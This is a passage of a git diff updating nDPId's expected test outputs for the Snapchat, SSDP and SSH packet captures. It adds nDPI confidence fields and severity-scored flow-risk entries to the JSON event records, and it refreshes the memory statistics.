59rBXUcS\/b99dzRuvrTn4J\/ue4MDIyF97xNnBgYWJgZ3A1cmRQZZl+WnuB1dsnif3fPXLu66NVPttQQNgnXFyeSpjbviVMPvsSkkKnJ8SbX7sSrj30mcX6\/VAWXm72+rLYpIjtI\/4Pe2rlv1IH2Krm6skeGqoRNs1+o\/\/F7btsDZbXktQe862OPNcfkPeJngtqrDrdXwUB1507jl12PbQL\/ybLt+9VWcsd2\/4OdQYxPekSfzHnGdBnksoD\/k8V3L9Lbv0bDO\/WlV93k58q8IeJ7Shd\/k5gaMNlDhaGUIXDxhq9\/GSvnhOXuMK\/o51lSdUZa\/fT3eR1Os3j\/XelmfQq11x5sr5uBC5NC2tpbFwyfLJZe8nnhYvF5pYurJx\/i93xZwbWvt+mx29md\/5kUgrJ0vgl\/6lq870XJzFvZL9lvZZeX8D\/9s4v3bXp609M\/CshlE3Mmg0EakyHDDbOtMsq6skVXu5mVPu76eNXwNe+pKj\/OfovXBece+Cifdpz8TnOjJcPFhjtTSzUqxSSAWrZv6p0iOl+y6nXK3m9XXNa84pm1qPWQefDM"}
 02248{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595865799037,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1595865799037,"pkt":"mt9Y+uvcCL6sCxduCABFAAVi60FAACUR+rESuIqOwKgMqQG7pGMFTlWjw1EwNDYFw4BG53qjBuoAAAACYTy54mZ50XnS5MjxpAEFJgJoF8maXr+sg1zn\/py4s01uT+X8o3fm32Z\/27aBGVRqMq8xaGKaAi01uU5r7HKLe2rJUVZS8PnsMSHkxhwPsDGXSFTBCa1buYUF0POAoYKBHKRMFYfrgNSNCkH5+SWw9rKxgbGBBbT4BJamyFwql91lwAIWXmqyajeyMCgxJzGwPOJwelV+Q+XeAp2UJcLnHOYoF61k4uIzt1c029EbLPLt6sSp3p+nMfUWyh25cXr5\/Lj3C57VR00SnBac\/\/rAaft1f6Pt3VWez2LXm7Zvhf7ucIn1hUv2VljJvYi2yU4R1D5jot2zuIlREZjtZA2E4BmRw4ANSDEBW4soJSBjm4EJUkmhYaBGZEnhBCkYrUGNuQWmC4zbDHEWjLAggsQEKCIgzRMDW0iJZwas2ozYWIBMBpIKO0R1gLW2QK5OmO8FmIZd9Nmd9mHxI2npw9M32V4MRUt84P7L8a4Fzt5vSk4eXX1V3sDULG9GWLXHGtbkddWzwlXCz+T\/urc6d87xbbvenHt+qjjl9n0Wcy4Gz83289XWTuxReCHfwaf1O838hMGLS4dUlrt66L5iDPAynCJ8vzf+ltZuT5vEz5Un5qRNkpqm9aXaLGKxjqNAidTltx7bLu3uYnMtNBYwqKqaoXhXZeebOVsnsa9tPnYk60f5M9N9wvzqKZuc9ze\/LA+7zdE+xV3ka7zG+sUZPs39Cd+nNVS2ZpWpzZ3Ko8Dca\/euSiM1JW3JzeZXM0vO5vnWyrzu3XR0vZi034nPoa86LARNZAXX27Ov8M+6VCKor\/WneHv8IVFn1pxrtbeY9irN9r\/8sxwAcED2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":50,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1595865799020,"flow_last_seen":1595865807311,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":10672,"flow_avg_l4_payload_len":213,"midstream":0,"ts_msec":1595865807311,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24":"SNI TLS extension was missing"},"proto":"QUIC.SnapchatCall","breed":"Acceptable","category":"Web"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":50,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1595865799020,"flow_last_seen":1595865807311,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":10672,"flow_avg_l4_payload_len":213,"midstream":0,"ts_msec":1595865807311,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.SnapchatCall","breed":"Acceptable","category":"Cloud"}}
 00163{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":50,"source":"snapchat_call.pcapng","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 50/50
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4596279 bytes
-~~ total memory freed........: 4596279 bytes
-~~ total allocations/frees...: 99603/99603
+~~ total memory allocated....: 4681232 bytes
+~~ total memory freed........: 4681232 bytes
+~~ total allocations/frees...: 101193/101193
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
 ~~ json string max len.......: 2279 chars
diff --git a/test/results/ssdp-m-search.pcap.out b/test/results/ssdp-m-search.pcap.out
index 1f01eebe4..ab1ad3c79 100644
--- a/test/results/ssdp-m-search.pcap.out
+++ b/test/results/ssdp-m-search.pcap.out
@@ -1,11 +1,11 @@
 00445{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ssdp-m-search.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1532054645808,"flow_last_seen":1532054645808,"flow_idle_time":180000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1532054645808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1532054645808,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":63,"pkt_l4_len":29,"ts_msec":1532054645808,"pkt":"\/\/\/\/\/\/\/\/AAibydCMCABFAAAxO0tAAEARmRfAqPIIwKjy\/6UNfpwAHf9xTS1TRUFSQ0ggKiBIVFRQLzEuMQ0K"}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1532054645808,"flow_last_seen":1532054645808,"flow_idle_time":180000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1532054645808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1532054645808,"flow_last_seen":1532054645808,"flow_idle_time":180000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1532054645808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1532054650808,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":63,"pkt_l4_len":29,"ts_msec":1532054650808,"pkt":"\/\/\/\/\/\/\/\/AAibydCMCABFAAAxSyxAAEARiTbAqPIIwKjy\/6UNfpwAHf9xTS1TRUFSQ0ggKiBIVFRQLzEuMQ0K"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1532054655808,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":63,"pkt_l4_len":29,"ts_msec":1532054655808,"pkt":"\/\/\/\/\/\/\/\/AAibydCMCABFAAAxW1JAAEAReRDAqPIIwKjy\/6UNfpwAHf9xTS1TRUFSQ0ggKiBIVFRQLzEuMQ0K"}
-00658{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":19,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1532054645808,"flow_last_seen":1532054730808,"flow_idle_time":180000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1532054735808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1532054645808,"flow_last_seen":1532054735808,"flow_idle_time":180000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1532054735808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":19,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1532054645808,"flow_last_seen":1532054730808,"flow_idle_time":180000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1532054735808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1532054645808,"flow_last_seen":1532054735808,"flow_idle_time":180000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1532054735808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"ssdp-m-search.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 19/19
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595380 bytes
-~~ total memory freed........: 4595380 bytes
-~~ total allocations/frees...: 99572/99572
+~~ total memory allocated....: 4680333 bytes
+~~ total memory freed........: 4680333 bytes
+~~ total allocations/frees...: 101162/101162
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
-~~ json string max len.......: 663 chars
-~~ json string avg len.......: 480 chars
+~~ json string max len.......: 689 chars
+~~ json string avg len.......: 493 chars
diff --git a/test/results/ssh.pcap.out b/test/results/ssh.pcap.out
index 4f8788f87..3b22e9aef 100644
--- a/test/results/ssh.pcap.out
+++ b/test/results/ssh.pcap.out
@@ -3,12 +3,13 @@
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1320435464760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAABAek9AAEAGi52sEO4BrBDuqOQbABY3Xn+qAAAAALAC\/\/+abgAAAgQFtAEDAwMBAQgKHJWv9QAAAAAEAgAA"}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1320435464760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1320435464760,"pkt":"AFBWwAAIAAwppUXgCABFAAA8AABAAEAGBfGsEO6orBDuAQAW5BtConY2N15\/q6ASFqC42wAAAgQFtAQCCAoAEyL4HJWv9QEDAwY="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1320435464760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAAA0xzVAAEAGPsOsEO4BrBDuqOQbABY3Xn+rQqJ2N4AQ\/\/\/+RgAAAQEIChyVr\/UAEyL4"}
-00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18":"SSH Obsolete Client Version\/Cipher"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}}
-00839{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18":"SSH Obsolete Client Version\/Cipher","19":"SSH Obsolete Server Version\/Cipher"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"","hassh_server":""}}
-00875{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1320435464760,"flow_last_seen":1320435464769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":946,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1320435464769,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18":"SSH Obsolete Client Version\/Cipher","19":"SSH Obsolete Server Version\/Cipher"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":""}}
-00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1320435464760,"flow_last_seen":1320435464770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":1730,"flow_avg_l4_payload_len":173,"midstream":0,"ts_msec":1320435464770,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18":"SSH Obsolete Client Version\/Cipher","19":"SSH Obsolete Server Version\/Cipher"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":"B1C6C0D56317555B85C7005A3DE29325"}}
-00752{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1320435464760,"flow_last_seen":1320435713237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":18498,"flow_avg_l4_payload_len":71,"midstream":0,"ts_msec":1320435713237,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"18":"SSH Obsolete Client Version\/Cipher","19":"SSH Obsolete Server Version\/Cipher"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"}}
-00153{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","total-events-serialized":11}
+00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}}
+00885{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}}
+01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"","hassh_server":""}}
+01067{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1320435464760,"flow_last_seen":1320435464769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":946,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1320435464769,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":""}}
+01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1320435464760,"flow_last_seen":1320435464770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":1730,"flow_avg_l4_payload_len":173,"midstream":0,"ts_msec":1320435464770,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":"B1C6C0D56317555B85C7005A3DE29325"}}
+00944{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1320435464760,"flow_last_seen":1320435713237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":18498,"flow_avg_l4_payload_len":71,"midstream":0,"ts_msec":1320435713237,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"}}
+00153{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","total-events-serialized":12}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 258/258
 ~~ skipped flows.............: 0
@@ -17,10 +18,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4604315 bytes
-~~ total memory freed........: 4604315 bytes
-~~ total allocations/frees...: 99815/99815
+~~ total memory allocated....: 4689268 bytes
+~~ total memory freed........: 4689268 bytes
+~~ total allocations/frees...: 101405/101405
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
